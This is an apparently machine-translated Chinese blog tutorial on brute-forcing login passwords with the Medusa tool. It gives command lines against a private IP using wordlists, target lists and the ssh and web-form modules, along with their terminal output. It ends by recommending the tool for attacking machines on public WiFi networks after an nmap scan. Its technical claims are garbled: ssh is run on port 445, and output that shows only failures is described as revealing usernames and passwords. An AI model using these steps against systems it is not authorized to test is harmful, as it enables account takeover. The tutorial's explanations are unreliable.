美杜莎破解WINDOWS密码

  • A+
所属分类:未分类

MEDUSA INTRO: -

Medusa用于使用IP地址和主机名进行暴力破解。 它通常使用字典来攻击网络中的IP。 如果受害者正在使用攻击者的网络。 攻击者可以扫描网络并确定要攻击的IPv4地址。

攻击者可以使用各种方法来收集密码。 美杜莎提供暴力攻击和用户输入。 攻击者可以在假设的基础上输入用户名和密码。 攻击者也可以在强制攻击时使用他/她自己的单词列表。

大部分时间medusa用于暴力登录页面,但今天我们将在操作系统上进行测试。 为了向您展示我们使用Windows 7进行测试或使用wordlist进行攻击或输入IPv4来收集密码。

  • 使用Medusa只需在Kali Linux终端输入medusa -h即可。

  • 在上面的屏幕截图中,它显示了medusa帮助页面,其中每个模块用于从文本文件强制IP或单独输入IP。
  • 输入medusa -d查看所有模块。

  • 在上面的屏幕截图中列出了在强制执行时使用的美杜莎模块。

使用词典: -

  • 输入medusa -h 192.168.1.4 -u A -P /root/Dowloads/wordlist.txt -M SSH -n 445
  • -h输入目标主机名或IP地址
  • -u用于输入目标用户名以进行测试。
  • -P文件包含要测试的密码。 任何wordlist都可以用来测试。
  • -m用于选择medusa中列出的任何模块。
  • -n用于输入端口号。 445
  root @ kali:〜/ Downloads# medusa -h 192.168.1.4 -u A -P /root/Downloads/wordlist.txt -M ssh -n 445 
  Medusa v2.2 [http://www.foofus.net](C)JoMo-Kun / Foofus Networks <jmk@foofus.net> 

  错误:ssh.mod:建立SSH会话失败(1/4):主机:192.168.1.4用户: A通行证: 123456 

  ^ CALERT:Medusa收到了SIGINT  - 向我们正在中止的登录线程发送通知。 
  • 首先它显示SSH mod失败,因为ssh未在目标操作系统中打开。 由于攻击者试图获得密码访问权限,因此大多数时间美杜莎将无法初始化模块,但会收集密码,这是攻击者的目标。
  • 执行上述命令后,medusa显示目标的用户名和密码。
  • 当我们按ctrl + C时它会关闭扫描并显示中止medusa命令。
  • 目标的上述信息非常敏感,可用于其他黑客活动。

使用目标清单: -

  • 类型

medusa -H /root/Downloads/target.txt -u A -P /root/Downloads/wordlist.txt -M ssh -n 445

要么

类型

medusa -h 192.168.1.4 -U /root/Downloads/target.txt -P /root/Downloads/wordlist.txt -M ssh -n 445

  • -H文件包含攻击者网络上的束目标或IP列表( /root/Downloads/target.txt包含IP地址列表,每行一个IP)
  • -u用于输入目标用户名以进行测试。
  • -P文件包含要测试的密码。 任何单词列表都可用于强制执行目标。
  • -m用于选择任何模块进行测试。
  • -n用于输入端口号。 445
  root @ kali:〜/ Downloads# medusa -H /root/Downloads/target.txt -u A -P /root/Downloads/wordlist.txt -M ssh -n 445 
  Medusa v2.2 [http://www.foofus.net](C)JoMo-Kun / Foofus Networks <jmk@foofus.net> 

  错误:ssh.mod:建立SSH会话失败(1/4):主机:192.168.1.4用户: A通行证: 123456 

  ^ CALERT:Medusa收到了SIGINT  - 向我们正在中止的登录线程发送通知。 
  • 执行上述命令后,它显示与上述命令中列出的输出相同的输出。 唯一的区别在于攻击者添加目标列表,其中包含用于强制执行的一堆目标。
  • 像往常一样ssh mod失败了,因为攻击者瞄准的是操作系统。
  • 最后美杜莎显示线程已经停止。
  • 目标的上述信息非常敏感,可用于其他黑客活动。

使用不同的模块: -

  • 类型

medusa -H /root/Downloads/target.txt -u A -P /root/Downloads/wordlist.txt-M web-form -n 445

  • -H文件包含攻击者网络上的束目标或IP列表。
  • -u用于输入目标用户名以进行测试。
  • -P文件包含要测试的密码。 任何单词列表都可用于强制执行目标。
  • -M用于选择任何模块进行测试但没有扩展名。
  • -n用于输入端口号。 445
  root @ kali:〜# medusa -H /root/Downloads/target.txt -u A -P /root/Downloads/wordlist.txt -M web-form -n 445
 Medusa v2.2 [http://www.foofus.net](C)JoMo-Kun / Foofus Networks <jmk@foofus.net>

 错误:[web-form.mod]未收到任何数据
 帐户检查:[网络表格]主持人:192.168.1.4(共1个,0个完成)用户: A (1个,共0个)密码: 123456 (1个,共2个) 
  • 执行上述命令后,medusa使用不同的模块在IP 192.168.1.4上显示用户名和密码。
  • Web表单显示错误,因为Web表单支持get-posts请求。 这里的模块是必须在medusa语法中使用的。 如果不使用模块,则会抛出错误。
  • 目标的上述信息非常敏感,可用于其他黑客活动。

输入时间放弃扫描到目标IP: -

  • 类型

medusa -H /root/Downloads/target.txt -u A -P /root/Downloads/wordlist.txt-M web-form -n 445 -g 2

  • -H文件包含攻击者网络上的束目标或IP列表。
  • -u用于输入目标用户名以进行测试。
  • -P文件包含要测试的密码。 任何单词列表都可用于强制执行目标。
  • -M用于选择任何模块进行测试,这里我们使用的是web-form
  • -n用于输入端口号。 445
  root @ kali:〜# medusa -H /root/Downloads/target.txt -u A -P /root/Downloads/wordlist.txt -M web-form -n 445 -g 2
 Medusa v2.2 [http://www.foofus.net](C)JoMo-Kun / Foofus Networks <jmk@foofus.net>

 错误:[web-form.mod]未收到任何数据
 帐户检查:[网络表格]主持人:192.168.1.4(共1个,0个完成)用户: A (1个,共0个)密码: 123456 (1个,共2个) 
  • 执行上述命令后,medusa在IP 192.168.1.4上显示用户名和密码。
  • 在这里,美杜莎表明,在上面给出没有。 几秒钟美杜莎将停止扫描目标是否找到密码。
  • 目标的上述信息非常敏感,可用于其他黑客活动。

medusa工具可用于强制操作系统的密码以及登录页面。 此工具可用于公共WIFI网络。 除了许多要求目标操作系统的哈希文件的工具之外,这个工具在破解密码方面非常快速和快速。 此工具只是尝试攻击通过网络可用的IP地址和端口号。 您可以运行nmap scan来检查公共WIFI网络中目标IP的端口号。

国际网络安全研究所的道德黑客研究员表示,在渗透测试的初始阶段,美杜莎很方便,您可以使用紧缩创建自己的单词列表

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: